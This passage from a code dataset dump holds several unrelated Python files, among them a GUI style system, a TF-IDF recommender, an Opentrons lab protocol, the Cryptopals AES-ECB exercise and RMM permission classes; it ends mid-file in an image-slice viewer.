``style[\"font\"]``\\\\ . It is possible\n to read, write and delete using this method. All styles are accessible in this manner\n and arbitrary strings are allowed as keys, though it is recommended to stick to valid\n Python identifiers.\n\n For convenience, it is also possible to access style attributes as literal attributes\n of a :py:class:`Style` instance, e.g. ``style.font``\\\\ . Note that this only allows\n accesses to style attributes whose name is a valid python identifier and that are\n not in the list of reserved attributes, stored in the class attribute\n :py:attr:`Style.ATTRIBUTES`\\\\ . It is also not possible to access style attributes that\n start with an underscore or are methods of :py:class:`Style` this way. 
This access\n mode also supports read, write and delete accesses.\n\n Note that unlike the helpers :py:class:`~peng3d.util.default_property` and\n :py:class:`~peng3d.util.default`\\\\ , :py:class:`Style` does not reset an override\n if a write with a value of ``None`` is performed.\n \"\"\"\n\n parent: Union[\"Style\", Dict[str, StyleValue]]\n \"\"\"\n Attribute that stores the parent of this style.\n \n May be changed during runtime, though most widgets will require a redraw to fully\n respect changed effective style values.\n \n It is usually not required to write to this attribute, since widgets do not currently\n support being moved between different submenus or even menus.\n \"\"\"\n\n ATTRIBUTES: List[str] = [\n \"parent\",\n \"ATTRIBUTES\",\n ]\n \"\"\"\n Internal list of attributes that are reserved and cannot be used for styles via\n attribute access.\n \n This list may be extended in the future. Note that all attributes that start with an\n underscore are also implicitly reserved.\n \"\"\"\n\n def __init__(\n self,\n parent: Optional[Union[\"Style\", Dict[str, StyleValue]]] = None,\n overrides: Optional[Dict[str, StyleValue]] = None,\n ) -> None:\n self.parent = parent\n\n if isinstance(parent, Style):\n # Register with parent to be notified of changes\n parent._children.add(self)\n\n self._children: Set[\"Style\"] = set()\n self._watchers: Set[StyleWatcher] = set()\n\n self._overrides: Dict[str, StyleValue] = util.default(overrides, {})\n\n def __getitem__(self, item: str) -> StyleValue:\n if item in self._overrides:\n return self._overrides[item]\n\n return self.parent[item]\n\n def __setitem__(self, key: str, value: StyleValue):\n oldval = self.get(key)\n contained = key in self\n self._overrides[key] = value\n\n if not contained or oldval != value:\n self._trigger_watchers(key, oldval)\n\n def __delitem__(self, key: str) -> None:\n # Only remove if overridden, reduces user code complexity\n if key in self._overrides:\n oldval = self._overrides[key]\n del self._overrides[key]\n\n if oldval != self[key]:\n self._trigger_watchers(key, oldval)\n\n def __contains__(self, item: str) -> bool:\n return item in self._overrides or item in self.parent\n\n def __getattr__(self, item: str) -> StyleValue:\n return self[item]\n\n def __setattr__(self, key: str, value) -> None:\n if (\n key[0] == \"_\" or key in self.ATTRIBUTES\n ): # We use key[0] == \"_\" because it much faster (over 3x)\n super().__setattr__(key, value)\n else:\n self[key] = value\n\n def update(\n self, _overrides: Optional[Dict[str, StyleValue]] = None, **kwargs\n ) -> None:\n \"\"\"\n Updates several style attributes at the same time.\n\n Note that this method only supports creating and modifying overrides. 
Keys not\n present in the given data will be kept as is.\n\n This method supports both passing in a dictionary and passing in keyword attributes.\n Note that in the case of a style attribute being present in both the dictionary\n and a keyword argument, the keyword argument takes precedence.\n\n :param _overrides: Optional dictionary to add/modify overrides from\n :type _overrides: Optional[Dict[str, StyleValue]]\n :param kwargs: Optional keyword arguments to add/modify overrides from\n :type kwargs: StyleValue\n :return: None\n :rtype: None\n \"\"\"\n if _overrides is not None:\n # self._overrides.update(_overrides)\n for key, val in _overrides.items():\n if key not in kwargs: # To prevent double triggers\n oldval = self.get(key) # get() avoids a KeyError for keys without a local override yet\n self._overrides[key] = val\n if oldval != val:\n self._trigger_watchers(key, oldval)\n\n # self._overrides.update(kwargs)\n for key, val in kwargs.items():\n oldval = self.get(key) # see above: the key may not be overridden yet\n self._overrides[key] = val\n if oldval != val:\n self._trigger_watchers(key, oldval)\n\n def is_overridden(self, key: str) -> bool:\n \"\"\"\n Checks whether a given key is currently being overridden.\n\n If this returns true, any change in parent styles will not affect the value\n of the given style attribute.\n\n :param key: Key to check\n :type key: str\n :return: whether key is currently overridden\n :rtype: bool\n \"\"\"\n return key in self._overrides\n\n def override_if_not_none(self, key: str, value: Optional[StyleValue]) -> None:\n \"\"\"\n Overrides the given key if the provided value is not ``None``\\\\ .\n\n This helper allows for easy style overriding via keyword arguments. Simply create\n a keyword argument in the constructor of an object that uses styles and set the\n default of that keyword argument to ``None``\\\\ . In the constructor, you can then\n call this function like so::\n\n self.style.override_if_not_none(\"font\", font)\n\n Note that this method is unsuitable for style attributes that may actually want\n to have a value of ``None``\\\\ .\n\n :param key: Key to override\n :type key: str\n :param value: value used to override if it is not ``None``\n :type value: Optional[StyleValue]\n :return: None\n :rtype: None\n \"\"\"\n if value is not None:\n self[key] = value\n\n def get(\n self, key: str, default: Optional[StyleValue] = None\n ) -> Optional[StyleValue]:\n \"\"\"\n Returns the effective value of the given key or the given default if it couldn't\n be found.\n \"\"\"\n if key in self._overrides:\n return self._overrides[key]\n return self.parent.get(key, default)\n\n @overload\n def add_watcher(self, watcher: StyleWatcher) -> None:\n pass\n\n @overload\n def add_watcher(\n self,\n selector: str,\n callback: Union[Callable[[StyleValue], Any], Callable[[], Any]],\n ) -> None:\n pass\n\n def add_watcher(self, watch_sel, callback=None):\n \"\"\"\n Adds a watcher for specific changes in local styles.\n\n Watchers can be used to automatically update widgets or other visual elements\n whenever the effective value of a style attribute changes. This includes scenarios\n where the (not locally overridden) style attribute of the parent changes, causing\n a change in the effective local value.\n\n The watcher system tries its best to remove unnecessary triggers and double-triggers,\n but they may still occur under some circumstances. Thus, it is recommended to\n only use (semi-)idempotent functions as callbacks. 
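A short sketch (``style`` is any :py:class:`Style` instance; per the implementation below, a one-argument callback receives the old value)::\n\n def on_font_change(oldval):\n print(\"font changed, old value was\", oldval)\n\n style.add_watcher(\"font\", on_font_change)\n style[\"font\"] = \"Courier New\" # fires on_font_change if the value actually changed\n\n 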
A popular example for a suitable\n callback would be the `redraw()` method of widgets, since it will only queue\n the actual redraw and thus prevents extraneous redraws.\n\n This method accepts either an instance of :py:class:`StyleWatcher` or a selector\n string followed by a callback function.\n\n Selectors are strings that describe what changes to listen to. Currently, selectors\n are quite rudimentary, but it is planned to add a more sophisticated system later.\n\n The special ``*`` selector matches all changes and will thus be triggered on any\n change of any local attribute.\n\n Alternatively, all other strings will trigger on the change of a style attribute\n with their exact name.\n\n Callback functions can either take no arguments or the old value of the style\n attribute as a single argument.\n \"\"\"\n if isinstance(watch_sel, StyleWatcher):\n sw = watch_sel\n elif isinstance(watch_sel, str) and callback is not None:\n sw = StyleWatcher(watch_sel, callback)\n else:\n raise TypeError(\"Invalid argument combination to add_watcher()\")\n\n sig = inspect.signature(sw.callback)\n if len(sig.parameters) > 1:\n raise TypeError(\n f\"Callback function must have exactly zero or one parameters, not {len(sig.parameters)}!\"\n )\n # Does not cover the case of a single keyword-only argument, which would pass the\n # check, but cause an error at callback-time. Such functions are relatively unusual\n # and thus not checked for\n\n self._watchers.add(sw)\n\n def _trigger_watchers(\n self, key: str, oldval: StyleValue, from_parent: Optional[bool] = False\n ):\n if from_parent and (oldval == self.get(key) or key not in self):\n # Skip if parent change is irrelevant for us\n # Could be either due to a local override or override in some intermediary\n return\n\n for selector, callback in self._watchers:\n match = (selector == key) or (selector == \"*\")\n\n # TODO: extend selector features\n\n if match:\n sig = inspect.signature(callback)\n if len(sig.parameters) == 1:\n callback(oldval)\n elif len(sig.parameters) == 0:\n callback()\n else:\n # Should have been caught earlier already, but just in case\n raise TypeError(\"Invalid callback\")\n\n for child in self._children:\n child._trigger_watchers(key, oldval, from_parent=True)\n\n\nDEFAULT_STYLE: Dict[str, StyleValue] = {\n \"font\": \"Arial\",\n \"font_size\": 16,\n \"font_color\": (62, 67, 73, 255),\n \"border\": (4, 4),\n \"borderstyle\": FlatBorder,\n}\n\"\"\"\nDefault styles for all parts of peng3d.\n\nThese styles represent a sensible default for common use cases.\n\nFor application-wide changes, it is recommended to override the styles in question using\nthe :py:attr:`peng3d.peng.Peng.style` attribute.\n\"\"\"\n","repo_name":"not-na/peng3d","sub_path":"peng3d/gui/style.py","file_name":"style.py","file_ext":"py","file_size_in_byte":19197,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"6734972995","text":"from sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport pandas as pd\nimport pickle\nimport random\n\nclass Tf_cs():\n def __init__(self): # Defining All the List used in Program\n self.l1=[] \n self.l2=[]\n self.l3=[]\n self.l4=[]\n self.l5=[]\n \n def gen(self,no): # Generating 3 Random Articles for each User\n for i in range(no): # List L4 contains all random articles for No. 
users\n for j in range(3):\n x=random.randint(0,2004)\n self.l4.append(x) # 0 indexing\n \n def input(self,x): # Appending the new article(user attribute) in original Articles\n d=pickle.load(open(\"Document.p\",\"rb\")) # Article X Article \n sen=''\n for i in range(3*x,3*x+3):\n sen+=d[self.l4[i]]+' '\n d.append(sen)\n return d # ALl articles + User's attribute(at last)\n \n def tf_idf(self,doc): #Calculate Tfidf\n vectorizer = TfidfVectorizer()\n tfidf_matrix=vectorizer.fit_transform(doc)\n pickle.dump(tfidf_matrix,open(\"Tfidf2.p\",\"wb\")) \n \n def cs(self,x,y): #Calculate Cosine Similarity\n tfidf_matrix=pickle.load(open(\"Tfidf2.p\",\"rb\"))\n cs_matrix=cosine_similarity(tfidf_matrix[x], tfidf_matrix) # x is the last article id Doc(User attribute)\n ls=cs_matrix[0].tolist() # Converting Sparse Matrix into List\n z=cs_matrix[0].tolist()\n ls.sort(reverse=True) # ls contains Cosine Similarities in Decreasing Order\n for j in range(1,4):\n self.l1.append(y+1) # y is User No\n a=z.index(ls[j]) # Artile No of Nth Similar Article\n self.l2.append(a+1) # O->1 Indexing\n self.l3.append(ls[j]) # Cosine Similarity of Nth Similar Article\n self.l5.append(self.l4[3*y+j-1]+1) # Article present in User Attribute\n \n def ans(self):\n df=pd.DataFrame({'Users':self.l1,'Articles':self.l5,'Similar Articles':self.l2,'Cosine Similarity':self.l3},\n columns=['Users','Articles','Similar Articles','Cosine Similarity'])\n \n return df","repo_name":"ishpreet-singh/recommendation_system","sub_path":"Content Based RS/User-Article Similarity/Tfidf_cs2.py","file_name":"Tfidf_cs2.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"37549364233","text":"### Since NFL Deprecated their results feed, results\n### will be imported using web scraping for now.\n\n### That means individual GameID primary keys are missing from source data.\n### This script will, once per season,\n### create a dictionary containing weekly GameIDs by Home Team.\n\n### That dictionary will be referenced by the results scraper to match results\n### to GameIDs, so they are ready for importing.\n\nimport json\n\nseason = \"2020\"\njsonfile = \"matchesimport_\"+season+\".json\"\n\nwith open(jsonfile) as jsonmatches:\n matchlist = json.load(jsonmatches)\n\nfilename = \"gameid_dict\" + str(season) + \".py\"\npath = './dictionaries' \"//\"\nfullpath = path+filename\noutfile = open(fullpath, \"w\")\n\ngames_2020 = {}\n \nfor week in range(1,18):\n dict_index = \"Week_\"+str(week)\n games_2020[dict_index] = {}\n for fixture in matchlist:\n if fixture['fields']['Week'] == week:\n home = fixture['fields']['HomeTeam']\n games_2020[dict_index][home] = fixture['pk']\n\noutfile.write(\"gameid_dict_\"+season+\" = \"+str(games_2020))\noutfile.close()","repo_name":"thefisk/pigskinpredictor","sub_path":"predictor/scripts/create_gameid_dict.py","file_name":"create_gameid_dict.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"32507889972","text":"k = 1\nwhile True:\n try:\n N = int(input())\n v = list(map(float, input().split()))\n vOrdenado = []\n for n in v:\n vOrdenado.append(n)\n vOrdenado.sort(reverse = True)\n senha = ''\n for _ in range(N):\n senha+= str(v.index(vOrdenado[_]))\n v[v.index(vOrdenado[_])] = 1\n print(f\"Caso {k}: {senha}\")\n k+=1\n except EOFError:\n 
break\n","repo_name":"lucas-albuq/PEOO","sub_path":"ListaPoo04B/2252.py","file_name":"2252.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"39735637522","text":"from opentrons import protocol_api\nfrom opentrons.types import Point\nfrom opentrons.drivers.rpi_drivers import gpio\nimport time\nimport math\nimport os\nimport subprocess\nimport json\n\n# metadata\nmetadata = {\n 'protocolName': 'S3 Station A Protocol 3 lysates Version 1',\n 'author': 'Sara , Miguel ',\n 'source': 'Custom Protocol Request',\n 'apiLevel': '2.3'\n}\n\n\n# Parameters to adapt the protocol\n# Warning writing any Parameters below this line.\n# It will be deleted if opentronsWeb is used.\n\nNUM_SAMPLES = 96\nLYSATE_LABWARE = 'opentrons plastic 2ml tubes'\nPLATE_LABWARE = 'nest deep generic well plate'\nTIPS1000 = 'opentrons'\nVOLUME_LYSATE = 400\nBEADS = False\nLANGUAGE = 'esp'\nRESET_TIPCOUNT = False\n\n# End Parameters to adapt the protocol\n\n## global vars\n## initialize robot object\nrobot = None\n# default var for drop tip switching\nswitch = True\n# initialize tip_log dictionary\ntip_log = {}\ntip_log['count'] = {}\ntip_log['tips'] = {}\ntip_log['max'] = {}\n\n\n# End Parameters to adapt the protocol\n\n\"\"\"\nNUM_SAMPLES is the number of samples, must be an integer number\n\nTIPS 1000\n biotix\n opentrons\n\nLYSATE_LABWARE must be one of the following:\n opentrons plastic 2ml tubes\n\nPLATE_LABWARE must be one of the following:\n opentrons deep generic well plate\n nest deep generic well plate\n vwr deep generic well plate\n\"\"\"\n\nTIPS1000_LW_DICT = {\n 'biotix': 'biotix_96_tiprack_1000ul',\n 'opentrons': 'opentrons_96_tiprack_1000ul'\n}\n\nLY_LW_DICT = {\n 'opentrons plastic 2ml tubes': 'opentrons_24_tuberack_generic_2ml_screwcap'\n}\n\nPL_LW_DICT = {\n 'opentrons deep generic well plate': 'usascientific_96_wellplate_2.4ml_deep',\n 'nest deep generic well plate': 'nest_96_deepwellplate_2000ul',\n 'vwr deep generic well plate': 'vwr_96_deepwellplate_2000ul'\n}\n\nLYSTUBE_LW_DICT = {\n # Radius of each possible tube\n '2ml tubes': 4\n}\n\nLANGUAGE_DICT = {\n 'esp': 'esp',\n 'eng': 'eng'\n}\n\nif LANGUAGE_DICT[LANGUAGE] == 'eng':\n VOICE_FILES_DICT = {\n 'start': './data/sounds/started_process.mp3',\n 'finish': './data/sounds/finished_process.mp3',\n 'close_door': './data/sounds/close_door.mp3',\n 'replace_tipracks': './data/sounds/replace_tipracks.mp3',\n 'empty_trash': './data/sounds/empty_trash.mp3'\n }\nelif LANGUAGE_DICT[LANGUAGE] == 'esp':\n VOICE_FILES_DICT = {\n 'start': './data/sounds/started_process_esp.mp3',\n 'finish': './data/sounds/finished_process_esp.mp3',\n 'close_door': './data/sounds/close_door_esp.mp3',\n 'replace_tipracks': './data/sounds/replace_tipracks_esp.mp3',\n 'empty_trash': './data/sounds/empty_trash_esp.mp3'\n }\n\n# Function definitions\ndef check_door():\n return gpio.read_window_switches()\n\ndef confirm_door_is_closed():\n if not robot.is_simulating():\n #Check if door is opened\n if check_door() == False:\n #Set light color to red and pause\n gpio.set_button_light(1,0,0)\n robot.pause()\n voice_notification('close_door')\n time.sleep(5)\n confirm_door_is_closed()\n else:\n #Set light color to green\n gpio.set_button_light(0,1,0)\n\ndef finish_run():\n voice_notification('finish')\n #Set light color to blue\n gpio.set_button_light(0,0,1)\n\ndef voice_notification(action):\n if not robot.is_simulating():\n fname = VOICE_FILES_DICT[action]\n if os.path.isfile(fname) is 
True:\n subprocess.run(\n ['mpg123', fname],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE\n )\n else:\n robot.comment(f\"Sound file does not exist. Call the technician\")\n\ndef reset_tipcount():\n os.remove('/data/A/tip_log.json', 'w')\n\ndef retrieve_tip_info(pip,tipracks,file_path = '/data/A/tip_log.json'):\n global tip_log\n if not tip_log['count'] or pip not in tip_log['count']:\n tip_log['count'][pip] = 0\n if not robot.is_simulating():\n if os.path.isfile(file_path):\n with open(file_path) as json_file:\n data = json.load(json_file)\n if 'P1000' in str(pip):\n tip_log['count'][pip] = data['tips1000']\n elif 'P300' in str(pip):\n tip_log['count'][pip] = data['tips300']\n elif 'P20' in str(pip):\n tip_log['count'][pip] = data['tips20']\n\n if \"8-Channel\" in str(pip):\n tip_log['tips'][pip] = [tip for rack in tipracks for tip in rack.rows()[0]]\n else:\n tip_log['tips'][pip] = [tip for rack in tipracks for tip in rack.wells()]\n\n tip_log['max'][pip] = len(tip_log['tips'][pip])\n\n return tip_log\n\ndef save_tip_info(file_path = '/data/A/tip_log.json'):\n data = {}\n if not robot.is_simulating():\n if os.path.isfile(file_path):\n os.rename(file_path,file_path + \".bak\")\n for pip in tip_log['count']:\n if \"P1000\" in str(pip):\n data['tips1000'] = tip_log['count'][pip]\n elif \"P300\" in str(pip):\n data['tips300'] = tip_log['count'][pip]\n elif \"P20\" in str(pip):\n data['tips20'] = tip_log['count'][pip]\n\n with open(file_path, 'a+') as outfile:\n json.dump(data, outfile)\n\ndef pick_up(pip,tiprack):\n ## retrieve tip_log\n global tip_log\n if not tip_log:\n tip_log = {}\n tip_log = retrieve_tip_info(pip,tiprack)\n if tip_log['count'][pip] == tip_log['max'][pip]:\n voice_notification('replace_tipracks')\n robot.pause('Replace ' + str(pip.max_volume) + 'µl tipracks before \\\nresuming.')\n confirm_door_is_closed()\n pip.reset_tipracks()\n tip_log['count'][pip] = 0\n pip.pick_up_tip(tip_log['tips'][pip][tip_log['count'][pip]])\n tip_log['count'][pip] += 1\n\ndef drop(pip):\n global switch\n if \"8-Channel\" not in str(pip):\n side = 1 if switch else -1\n drop_loc = robot.loaded_labwares[12].wells()[0].top().move(Point(x=side*20))\n pip.drop_tip(drop_loc,home_after=False)\n switch = not switch\n else:\n drop_loc = robot.loaded_labwares[12].wells()[0].top().move(Point(x=20))\n pip.drop_tip(drop_loc,home_after=False)\n\ndef transfer_samples(sources, dests, pip, tiprack):\n # height for aspiration has to be different depending if you ar useing tubes or wells\n if 'strip' in LYSATE_LABWARE or 'plate' in LYSATE_LABWARE:\n height = 1.5\n else:\n height = 2\n # transfer\n for s, d in zip(sources, dests):\n pick_up(pip,tiprack)\n pip.transfer(VOLUME_LYSATE, s.bottom(height), d.bottom(15), air_gap=20, new_tip='never')\n if BEADS:\n pip.mix(3,400,d.bottom(4))\n #pip.blow_out(d.top(-2))\n pip.aspirate(50, d.top(-2))\n drop(pip)\n\n# RUN PROTOCOL\ndef run(ctx: protocol_api.ProtocolContext):\n global robot\n robot = ctx\n\n # check if tipcount is being reset\n if RESET_TIPCOUNT:\n reset_tipcount()\n\n # load tips\n tips1000 = [\n robot.load_labware(TIPS1000_LW_DICT[TIPS1000], slot,\n '1000µl filter tiprack')\n for slot in ['3']\n ]\n\n # load pipette\n p1000 = robot.load_instrument(\n 'p1000_single_gen2', 'left', tip_racks=tips1000)\n\n # check source (LYSATE) labware type\n if LYSATE_LABWARE not in LY_LW_DICT:\n raise Exception('Invalid LYSATE_LABWARE. 
Must be one of the \\\nfollowing:\\nopentrons plastic 2ml tubes')\n # load LYSATE labware\n if 'plate' in LYSATE_LABWARE:\n source_racks = robot.load_labware(\n LY_LW_DICT[LYSATE_LABWARE], '1',\n 'RNA LYSATE labware')\n else:\n source_racks = [\n robot.load_labware(LY_LW_DICT[LYSATE_LABWARE], slot,\n 'sample LYSATE labware ' + str(i+1))\n for i, slot in enumerate(['4', '1', '5', '2'])\n ]\n\n # check plate\n if PLATE_LABWARE not in PL_LW_DICT:\n raise Exception('Invalid PLATE_LABWARE. Must be one of the \\\nfollowing:\\nopentrons deep generic well plate\\nnest deep generic well plate\\nvwr deep generic well plate')\n\n # load pcr plate\n wells_plate = robot.load_labware(PL_LW_DICT[PLATE_LABWARE], 10,\n 'sample LYSATE well plate ')\n\n # setup sources and dests\n sources = [tube for s in source_racks for tube in s.wells()]\n dests = wells_plate.wells()\n\n # check top-left and bottom-right well of each labware with each pipette which uses them\n pick_up(p1000, tips1000)\n for position in [sources[0], sources[23], sources[24], sources[47], sources[48], sources[71], sources[72], sources[-1]]:\n p1000.move_to(position.top())\n robot.pause(f\"Is it at the top of the well?\")\n p1000.aspirate(VOLUME_LYSATE, position.bottom(2))\n p1000.move_to(position.top())\n robot.pause(f\"Did it aspirate correctly?\")\n p1000.dispense(VOLUME_LYSATE, position.top(-2))\n p1000.move_to(position.top())\n robot.pause(f\"Did it dispense all the liquid?\")\n for position in [dests[0], dests[-1]]:\n p1000.move_to(position.top())\n robot.pause(f\"Is it at the top of the well?\")\n drop(p1000)\n\n # track final used tip\n save_tip_info()\n","repo_name":"BU-ISCIII/opentrons_covid19","sub_path":"calibration_check/stationA_protocol3_lysates_S3_calibration.py","file_name":"stationA_protocol3_lysates_S3_calibration.py","file_ext":"py","file_size_in_byte":9318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38119840460","text":"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nimport base64\nfrom cryptography.hazmat.primitives import padding\nfrom cryptography.hazmat.backends import default_backend\n\n# Load the encrypted data from the file\nwith open(\"7.txt\", \"rb\") as f:\n encrypted_data = f.read()\n\n# Decode the encrypted data from Base64\nencrypted_data = base64.b64decode(encrypted_data)\n\n# Create a Cipher object using the AES algorithm and the ECB mode\ncipher = Cipher(algorithms.AES(b\"YELLOW SUBMARINE\"), modes.ECB(), backend=default_backend())\n\n# Create a decryption context\ndecryptor = cipher.decryptor()\n\n# Decrypt the encrypted data\npadded_plaintext = decryptor.update(encrypted_data) + decryptor.finalize()\n\n# Remove the padding from the plaintext\nunpadder = padding.PKCS7(128).unpadder()\nplaintext = unpadder.update(padded_plaintext)\nplaintext += unpadder.finalize()\n\n# Print the plaintext\nprint(plaintext)\n","repo_name":"0xspringtime/cryptopals","sub_path":"1-7.py","file_name":"1-7.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"25791516655","text":"import random\n\n\"\"\"The goal of this code is to check an array and see if the sum of 2 of its element add up to a target\nand if so, return their index in the array.\nWe create the array based on user input \"\"\"\n\ndef finder(n):\n print('your array is : ' + str(n))\n res = [0]\n for i in range(len(n)):\n num = n[i]\n delta = target-num\n if delta > 0 
and delta in n[i+1:]:\n res.append([n.index(n[i],i),n.index(delta,i+1)])\n res[0] += 1\n if res[0] > 0:\n return res\n else:\n print(\"There is no solution\")\n \ndef rando(s,m):\n arr = []\n for _ in range(s):\n arr.append(random.randrange(1,m+1))\n return finder(arr)\n\nsize = int(input('What\\'s the size of the array'))\nmax = int(input('What\\'s the maximum int in the array'))\ntarget = random.randrange(max/2,max)\nprint(\"the target is : \" + str(target))\nresult = rando(size,max)\nif (result != None):\n print(f\"there is {str(result[0])} solution :\")\n for i in range(1,result[0]+1):\n print(f\"You can add the index {result[i][0]} and {result[i][1]}\")\n","repo_name":"Otiston/Random-code","sub_path":"Find my sum index.py","file_name":"Find my sum index.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39610092387","text":"from rest_framework import permissions\n\nfrom tacticalrmm.permissions import (\n _has_perm,\n _has_perm_on_agent,\n _has_perm_on_client,\n _has_perm_on_site,\n)\n\n\nclass ChecksPerms(permissions.BasePermission):\n def has_permission(self, r, view) -> bool:\n if r.method in (\"GET\", \"PATCH\"):\n if \"agent_id\" in view.kwargs.keys():\n return _has_perm(r, \"can_list_checks\") and _has_perm_on_agent(\n r.user, view.kwargs[\"agent_id\"]\n )\n else:\n return _has_perm(r, \"can_list_checks\")\n else:\n return _has_perm(r, \"can_manage_checks\")\n\n\nclass RunChecksPerms(permissions.BasePermission):\n def has_permission(self, r, view) -> bool:\n return _has_perm(r, \"can_run_checks\") and _has_perm_on_agent(\n r.user, view.kwargs[\"agent_id\"]\n )\n\n\nclass BulkRunChecksPerms(permissions.BasePermission):\n def has_permission(self, r, view) -> bool:\n if not _has_perm(r, \"can_run_checks\"):\n return False\n\n if view.kwargs[\"target\"] == \"client\":\n return _has_perm_on_client(user=r.user, client_id=view.kwargs[\"pk\"])\n\n elif view.kwargs[\"target\"] == \"site\":\n return _has_perm_on_site(user=r.user, site_id=view.kwargs[\"pk\"])\n\n return False\n","repo_name":"amidaware/tacticalrmm","sub_path":"api/tacticalrmm/checks/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":2312,"dataset":"github-code","pt":"48"} +{"seq_id":"24710534927","text":"from __future__ import print_function\n\n__revision__ = \"$Id$\"\n\nimport getopt\nimport sys\n\nfrom invenio.base.helpers import with_app_context\n\ndef usage(exitcode=1, msg=\"\"):\n \"\"\"Prints usage info.\"\"\"\n if msg:\n print(\"Error: %s.\" % msg, file=sys.stderr)\n print(file=sys.stderr)\n print(\"\"\"Usage: %s [options]\n\nGeneral options:\n -h, --help\\t\\tprint this help\n -V, --version\\t\\tprint version number\n\nAuthentication options:\n -u, --user=USER\\tUser name needed to perform the administrative task\n\nOption to administrate authorizations:\n -a, --add\\t\\tadd default authorization settings\n -c, --compile\\t\\tcompile firewall like role definitions (FireRole)\n -r, --reset\\t\\treset to default settings\n -D, --demo\\t\\tto be used with -a or -r in order to consider demo site authorizations\n\"\"\" % sys.argv[0], file=sys.stderr)\n sys.exit(exitcode)\n\n\n@with_app_context()\ndef main():\n \"\"\"Main function that analyzes command line input and calls whatever\n is appropriate. 
\"\"\"\n\n from invenio.modules.access.firerole import repair_role_definitions\n from invenio.modules.access.control import (acc_add_default_settings,\n acc_reset_default_settings)\n from invenio.base.globals import cfg\n from invenio.legacy.bibsched.bibtask import authenticate\n\n DEF_DEMO_USER_ROLES = cfg.get('DEF_DEMO_USER_ROLES', tuple())\n DEF_DEMO_ROLES = cfg.get('DEF_DEMO_ROLES', tuple())\n DEF_DEMO_AUTHS = cfg.get('DEF_DEMO_AUTHS', tuple())\n\n ## parse command line:\n # set user-defined options:\n options = {'user' : '', 'reset' : 0, 'compile' : 0, 'add' : 0, 'demo' : 0}\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"hVu:racD\",\n [\"help\", \"version\", \"user=\",\n \"reset\", \"add\", \"compile\", \"demo\"])\n except getopt.GetoptError as err:\n usage(1, err)\n try:\n for opt in opts:\n if opt[0] in (\"-h\", \"--help\"):\n usage(0)\n elif opt[0] in (\"-V\", \"--version\"):\n print(__revision__)\n sys.exit(0)\n elif opt[0] in (\"-u\", \"--user\"):\n options[\"user\"] = opt[1]\n elif opt[0] in (\"-r\", \"--reset\"):\n options[\"reset\"] = 1\n elif opt[0] in (\"-a\", \"--add\"):\n options[\"add\"] = 1\n elif opt[0] in (\"-c\", \"--compile\"):\n options[\"compile\"] = 1\n elif opt[0] in (\"-D\", \"--demo\"):\n options[\"demo\"] = 1\n else:\n usage(1)\n if options['add'] or options['reset'] or options['compile']:\n #if acca.acc_get_action_id('cfgwebaccess'):\n # # Action exists hence authentication works :-)\n # options['user'] = authenticate(options['user'],\n # authorization_msg=\"WebAccess Administration\",\n # authorization_action=\"cfgwebaccess\")\n if options['reset'] and options['demo']:\n acc_reset_default_settings(\n [cfg['CFG_SITE_ADMIN_EMAIL']], DEF_DEMO_USER_ROLES,\n DEF_DEMO_ROLES, DEF_DEMO_AUTHS)\n print(\"Reset default demo site settings.\")\n elif options['reset']:\n acc_reset_default_settings([cfg['CFG_SITE_ADMIN_EMAIL']])\n print(\"Reset default settings.\")\n elif options['add'] and options['demo']:\n acc_add_default_settings(\n [cfg['CFG_SITE_ADMIN_EMAIL']], DEF_DEMO_USER_ROLES,\n DEF_DEMO_ROLES, DEF_DEMO_AUTHS)\n print(\"Added default demo site settings.\")\n elif options['add']:\n acc_add_default_settings([cfg['CFG_SITE_ADMIN_EMAIL']])\n print(\"Added default settings.\")\n if options['compile']:\n repair_role_definitions()\n print(\"Compiled firewall like role definitions.\")\n else:\n usage(1, \"You must specify at least one command\")\n except StandardError as e:\n from invenio.ext.logging import register_exception\n register_exception()\n usage(e)\n return\n\n### okay, here we go:\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"chokribr/invenio","sub_path":"invenio/modules/access/scripts/webaccessadmin.py","file_name":"webaccessadmin.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73878014224","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport torch\n\nfrom monai.data import DataLoader\n\n\nclass IndexTracker(object):\n \"\"\"\n Image Slices Viewer\n Scroll through 2D image slices of a 3D array.\n https://matplotlib.org/3.1.0/gallery/event_handling/image_slices_viewer.html\n \"\"\"\n def __init__(self, ax, X):\n self.ax = ax\n\n self.X = X\n rows, cols, self.slices = X.shape\n self.ind = self.slices//2\n\n self.im = ax.imshow(self.X[:, :, self.ind], cmap='gray')\n self.update()\n\n def onscroll(self, event):\n if event.button == 'up':\n self.ind = (self.ind + 1) % self.slices\n else:\n self.ind = (self.ind - 1) % 
